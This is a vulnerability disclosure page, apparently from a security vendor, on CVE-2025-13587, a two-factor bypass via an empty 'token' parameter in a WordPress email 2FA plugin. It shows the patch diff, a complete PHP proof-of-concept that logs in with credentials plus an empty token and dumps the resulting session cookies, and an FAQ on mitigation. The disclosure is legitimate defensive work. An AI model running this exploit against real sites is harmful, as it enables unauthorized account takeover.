+                        <div><strong>Two Factor (2FA) Authentication via Email</strong><br>' . esc_html__('We have not detected a plugin installed that will handle your emails via SMTP. Please note, if you enable our plugin for a user you must make sure that your WordPress website sends emails correctly, otherwise the user will be locked out until email sending works on your website.', 'two-factor-2fa-via-email') . '</div>
                     </div>';

-        printf( '<div class="%1$s" data-type="smtp"><p>%2$s</p></div>', esc_attr( $class ), $message);
+        printf( '<div class="%1$s" data-type="smtp"><p>%2$s</p></div>', esc_attr( $class ), wp_kses_post($message));

     }

     function admin_enqueue_scripts() {

         wp_enqueue_style('SS88_2FAVE', plugin_dir_url( __FILE__ ) . 'assets/css/user.css', false, $this->version);
-        wp_enqueue_script('SS88_2FAVE-admin', plugin_dir_url( __FILE__ ) . 'assets/js/admin.js', false, $this->version);
+        wp_enqueue_script('SS88_2FAVE-admin', plugin_dir_url( __FILE__ ) . 'assets/js/admin.js', false, $this->version, ['in_footer' => true]);
         wp_localize_script('SS88_2FAVE-admin', 'ss88', array('ajax_url' => admin_url( 'admin-ajax.php' )));

     }

     function processTokenLogin()
     {
-        if(!isset($_GET['token'])) return;
+        if(!isset($_GET['token']) || $_GET['token'] === '') return;

         $Token = sanitize_text_field($_GET['token']);

@@ -135,7 +136,7 @@

             if(!$Token) {

-                $this->outputPage('<p><strong>'. __('Token Decryption Failure', 'two-factor-2fa-via-email') .'</strong><p><p>'. __('The token you are using is invalid and could not be decrypted. Please try logging in again.', 'two-factor-2fa-via-email') .'</p>');
+                $this->outputPage('<p><strong>'. esc_html__('Token Decryption Failure', 'two-factor-2fa-via-email') .'</strong><p><p>'. esc_html__('The token you are using is invalid and could not be decrypted. Please try logging in again.', 'two-factor-2fa-via-email') .'</p>');

             }

@@ -150,7 +151,7 @@
         if(isset($Token_GET) && isset($UserID) && isset($Token_UA))
         {
             $U = get_userdata($UserID);
-            if(!$U) die( __('User does not exist.', 'two-factor-2fa-via-email') );
+            if(!$U) die( esc_html__('User does not exist.', 'two-factor-2fa-via-email') );
             $UserID = $U->ID;

             $Token = get_user_meta($UserID, 'SS882FAEmail_token', true);
@@ -158,19 +159,19 @@

 		    if(((time() - $Timestamp) >= ($this->expires * 60))) {

-                $this->outputPage('<p><strong>'. __('Token Expired', 'two-factor-2fa-via-email') .'</strong><p><p>'. __('The token you are using has expired.', 'two-factor-2fa-via-email') .'</p>');
+                $this->outputPage('<p><strong>'. esc_html__('Token Expired', 'two-factor-2fa-via-email') .'</strong><p><p>'. esc_html__('The token you are using has expired.', 'two-factor-2fa-via-email') .'</p>');

             }

             if($Token_UA!==md5($_SERVER['HTTP_USER_AGENT'])) {

-                $this->outputPage('<p><strong>'. __('Agent Mismatch', 'two-factor-2fa-via-email') .'</strong><p><p>'. __("The token's User Agent does not match.", 'two-factor-2fa-via-email') .'</p>');
+                $this->outputPage('<p><strong>'. esc_html__('Agent Mismatch', 'two-factor-2fa-via-email') .'</strong><p><p>'. esc_html__("The token's User Agent does not match.", 'two-factor-2fa-via-email') .'</p>');

             }

             if($Token_GET!==$Token) {

-                $this->outputPage('<p><strong>'. __('Token Mismatch', 'two-factor-2fa-via-email') .'</strong><p><p>'. __('The token you are using does not match or has already been used.', 'two-factor-2fa-via-email') .'</p>');
+                $this->outputPage('<p><strong>'. esc_html__('Token Mismatch', 'two-factor-2fa-via-email') .'</strong><p><p>'. esc_html__('The token you are using does not match or has already been used.', 'two-factor-2fa-via-email') .'</p>');

             }

@@ -215,7 +216,7 @@

 	public function wp_login($user_login, $U) {

-		if(!isset($_GET['token'])) {
+		if(!isset($_GET['token']) || $_GET['token'] === '') {

 			if(!$this->isEnabled($U->ID)) return;

@@ -228,8 +229,8 @@
 			if($this->emailToken($U)) {

 				$this->outputPage('
-					<p><strong>'. __('Account Protected', 'two-factor-2fa-via-email') .'</strong><p>
-					<p>'. __('This account has Two Factor Authentication (2FA) enabled.', 'two-factor-2fa-via-email') .'<br />'. __('Please check your email inbox (including Spam/Junk) for your unique login link.', 'two-factor-2fa-via-email') .'</p>
+					<p><strong>'. esc_html__('Account Protected', 'two-factor-2fa-via-email') .'</strong><p>
+					<p>'. esc_html__('This account has Two Factor Authentication (2FA) enabled.', 'two-factor-2fa-via-email') .'<br />'. esc_html__('Please check your email inbox (including Spam/Junk) for your unique login link.', 'two-factor-2fa-via-email') .'</p>
 					<p><small id="timertext">'. sprintf( wp_kses( __('The unique link will expire in <span id="timer" data-minutes="%1$s">%1$s minutes</span>.', 'two-factor-2fa-via-email'), ['span' => ['id' => true, 'data-minutes' => true]]), $this->expires) .'</small></p>
 				');

@@ -237,8 +238,8 @@
 			else {

 				$this->outputPage('
-					<p><strong>'. __('Email Error', 'two-factor-2fa-via-email') .'</strong><p>
-					<p>'. __('This account has Two Factor Authentication (2FA) enabled.', 'two-factor-2fa-via-email') .'<br />'. __('The website was unable to send the verification email. Please try again or contact the website owner.', 'two-factor-2fa-via-email') .'</p>
+					<p><strong>'. esc_html__('Email Error', 'two-factor-2fa-via-email') .'</strong><p>
+					<p>'. esc_html__('This account has Two Factor Authentication (2FA) enabled.', 'two-factor-2fa-via-email') .'<br />'. esc_html__('The website was unable to send the verification email. Please try again or contact the website owner.', 'two-factor-2fa-via-email') .'</p>
 				');

 			}
@@ -261,7 +262,7 @@
 			if ($user && $user->ID && $this->isEnabled($user->ID, 'API')) {
 				return new WP_Error(
 					'rest_forbidden',
-					__('2FA is enabled on this account. Unable to authenticate.', 'two-factor-2fa-via-email'),
+					esc_html__('2FA is enabled on this account. Unable to authenticate.', 'two-factor-2fa-via-email'),
 					['status' => 403]
 				);
 			}
@@ -359,7 +360,7 @@
 			'url' => $LoginLink,
 		];

-		return wp_mail($U->user_email, __('Here is your one-click login link', 'two-factor-2fa-via-email'), '', ['Content-Type: text/html; charset=UTF-8']);
+		return wp_mail($U->user_email, esc_html__('Here is your one-click login link', 'two-factor-2fa-via-email'), '', ['Content-Type: text/html; charset=UTF-8']);

 	}

@@ -396,13 +397,13 @@
     <table class="form-table" role="presentation" id="ss882faemail-table">
         <tbody>
             <tr>
-                <th><?php echo __('Enabled 2FA?', 'two-factor-2fa-via-email'); ?></th>
+                <th><?php echo esc_html__('Enabled 2FA?', 'two-factor-2fa-via-email'); ?></th>
                 <td>
                     <input type="checkbox" name="ss882fa_email_enabled" id="ss882fa_email_enabled" <?php echo esc_attr($isChecked); ?> /><label for="ss882fa_email_enabled">Toggle</label>
                 </td>
             </tr>
             <tr>
-                <th><?php echo __('Enable 2FA for REST API?', 'two-factor-2fa-via-email'); ?></th>
+                <th><?php echo esc_html__('Enable 2FA for REST API?', 'two-factor-2fa-via-email'); ?></th>
                 <td>
                     <input type="checkbox" name="ss882fa_api_enabled" id="ss882fa_api_enabled" <?php echo esc_attr($isCheckedAPI); ?> /><label for="ss882fa_api_enabled">Toggle</label>
                 </td>
@@ -469,7 +470,7 @@
 			require_once(plugin_dir_path(__FILE__) . 'assets/html/plugin-deactivated.php');
 			$the_email = ob_get_clean();

-			wp_mail($AdminEmail, __('2FA Plugin was deactivated!', 'two-factor-2fa-via-email'), $the_email, ['Content-Type: text/html; charset=UTF-8', 'X-Priority: 1 (Highest)', 'X-MSMail-Priority: High', 'Importance: High']);
+			wp_mail($AdminEmail, esc_html__('2FA Plugin was deactivated!', 'two-factor-2fa-via-email'), $the_email, ['Content-Type: text/html; charset=UTF-8', 'X-Priority: 1 (Highest)', 'X-MSMail-Priority: High', 'Importance: High']);

 		}

@@ -481,14 +482,14 @@

     function plugin_action_links($actions) {
         $mylinks = [
-            '<a href="https://wordpress.org/support/plugin/two-factor-2fa-via-email/" target="_blank">'. __('Need help?', 'two-factor-2fa-via-email') .'</a>',
+            '<a href="https://wordpress.org/support/plugin/two-factor-2fa-via-email/" target="_blank">'. esc_html__('Need help?', 'two-factor-2fa-via-email') .'</a>',
         ];
         return array_merge( $actions, $mylinks );
     }

 	function debug($msg) {

-		error_log("n" . '[' . date('Y-m-d H:i:s') . '] ' .  $msg, 3, plugin_dir_path(__FILE__) . 'debug.log');
+		error_log("n" . '[' . gmdate('Y-m-d H:i:s') . '] ' .  $msg, 3, plugin_dir_path(__FILE__) . 'debug.log');

 	}

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-13587 - Two Factor (2FA) Authentication via Email <= 1.9.8 - Two-Factor Authentication Bypass via token

<?php
/**
 * Proof of Concept for CVE-2025-13587
 * Two-Factor Authentication Bypass in Two Factor (2FA) Authentication via Email WordPress Plugin
 * 
 * This script demonstrates the authentication bypass vulnerability by attempting to login
 * with valid credentials while appending an empty token parameter to bypass 2FA.
 * 
 * Usage: php poc.php --url=https://target.com --username=admin --password=password
 */

// Configuration
$target_url = ''; // Set target WordPress site URL
$username = '';
$password = '';

// Parse command line arguments
if ($argc > 1) {
    foreach ($argv as $arg) {
        if (strpos($arg, '--url=') === 0) {
            $target_url = substr($arg, 6);
        } elseif (strpos($arg, '--username=') === 0) {
            $username = substr($arg, 11);
        } elseif (strpos($arg, '--password=') === 0) {
            $password = substr($arg, 11);
        } elseif ($arg === '--help') {
            echo "Usage: php poc.php --url=https://target.com --username=admin --password=passwordn";
            exit(0);
        }
    }
}

if (empty($target_url) || empty($username) || empty($password)) {
    echo "Error: Missing required parameters.n";
    echo "Usage: php poc.php --url=https://target.com --username=admin --password=passwordn";
    exit(1);
}

// Initialize cURL session
$ch = curl_init();

// Step 1: Get login page to retrieve nonce and cookies
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

$response = curl_exec($ch);
$header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
$headers = substr($response, 0, $header_size);
$body = substr($response, $header_size);

// Extract cookies from response
preg_match_all('/^Set-Cookie:s*([^;]*)/mi', $headers, $matches);
$cookies = [];
foreach($matches[1] as $item) {
    parse_str($item, $cookie);
    $cookies = array_merge($cookies, $cookie);
}
$cookie_string = implode('; ', array_map(function($k, $v) { return "$k=$v"; }, array_keys($cookies), $cookies));

// Extract login form nonce (log)
preg_match('/name="log" value="([^"]*)"/', $body, $log_match);
$log_nonce = $log_match[1] ?? '';

// Extract wpnonce
preg_match('/name="_wpnonce" value="([^"]*)"/', $body, $nonce_match);
$wp_nonce = $nonce_match[1] ?? '';

// Step 2: Attempt login with bypass token parameter
$login_url = $target_url . '/wp-login.php?token=';
// The empty token parameter triggers the bypass vulnerability

$post_fields = http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1',
    '_wpnonce' => $wp_nonce
]);

curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
curl_setopt($ch, CURLOPT_COOKIE, $cookie_string);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);

$login_response = curl_exec($ch);
$login_header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
$login_headers = substr($login_response, 0, $login_header_size);
$login_body = substr($login_response, $login_header_size);

// Check for successful login (redirect to wp-admin)
if (strpos($login_headers, 'Location: ' . $target_url . '/wp-admin/') !== false) {
    echo "[SUCCESS] Authentication bypass successful!n";
    echo "The 2FA protection was bypassed using the empty token parameter.n";
    echo "User '$username' is now logged in without completing two-factor authentication.n";
    
    // Extract session cookies
    preg_match_all('/^Set-Cookie:s*([^;]*)/mi', $login_headers, $login_matches);
    $session_cookies = [];
    foreach($login_matches[1] as $item) {
        parse_str($item, $cookie);
        $session_cookies = array_merge($session_cookies, $cookie);
    }
    
    echo "nSession cookies obtained:n";
    foreach ($session_cookies as $name => $value) {
        echo "  $name: $valuen";
    }
} else {
    echo "[FAILURE] Authentication bypass attempt failed.n";
    echo "Possible reasons:n";
    echo "  1. Invalid credentialsn";
    echo "  2. Plugin not installed or not protecting this usern";
    echo "  3. Target may have patched the vulnerabilityn";
    
    // Check for 2FA page
    if (strpos($login_body, 'Account Protected by 2FA via Email') !== false) {
        echo "n[INFO] 2FA page detected - bypass failed (plugin may be patched)n";
    }
}

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2025-13587?
Overview of the vulnerability
CVE-2025-13587 is a vulnerability in the Two Factor (2FA) Authentication via Email plugin for WordPress, affecting versions up to and including 1.9.8. It allows attackers to bypass two-factor authentication by manipulating the ‘token’ HTTP GET parameter during login.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability exists because the plugin does not validate the contents of the ‘token’ parameter. An attacker can supply any value, including an empty string, to bypass the 2FA requirement, allowing unauthorized access to user accounts.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the Two Factor (2FA) Authentication via Email plugin version 1.9.8 or earlier is affected. Administrators should check their plugin version to determine if they are vulnerable.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, verify the version of the Two Factor (2FA) Authentication via Email plugin installed on your WordPress site. If it is version 1.9.8 or earlier, your site is at risk.
How can I fix this vulnerability?
Updating the plugin
To mitigate this vulnerability, update the Two Factor (2FA) Authentication via Email plugin to version 1.9.9 or later, where the issue has been patched. Regularly check for updates to ensure ongoing security.
What does the CVSS score of 6.5 mean?
Understanding risk levels
A CVSS score of 6.5 indicates a medium severity vulnerability. This means it poses a moderate risk to systems, and while it may not be critical, it should be addressed promptly to prevent potential exploitation.
What practical risks does this vulnerability pose?
Potential consequences of exploitation
Exploitation of this vulnerability allows attackers to bypass two-factor authentication, leading to unauthorized access to user accounts. This can result in privilege escalation, data exposure, and potential site compromise.
What changes were made in the patched version?
Details of the fix
In version 1.9.9, the plugin was updated to enforce validation of the ‘token’ parameter, ensuring it is not only present but also not empty. This strengthens the security of the authentication process.
How does the proof of concept demonstrate the vulnerability?
Technical demonstration
The proof of concept shows how an attacker can use valid credentials along with an empty ‘token’ parameter to log in without completing the two-factor authentication process. This illustrates the ease of exploiting the vulnerability.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updates are not possible, consider disabling the plugin until it can be updated. Additionally, monitor user accounts for suspicious activity and implement other security measures to protect your site.
Are there any additional security measures I should consider?
Enhancing overall security
In addition to updating the plugin, consider implementing other security practices such as using strong passwords, enabling logging and monitoring, and employing a web application firewall to further protect your WordPress site.
Where can I find more information about this vulnerability?
Resources for further reading
For more information about CVE-2025-13587, you can refer to the official CVE database, security advisories from the plugin developers, and trusted security blogs that cover WordPress vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations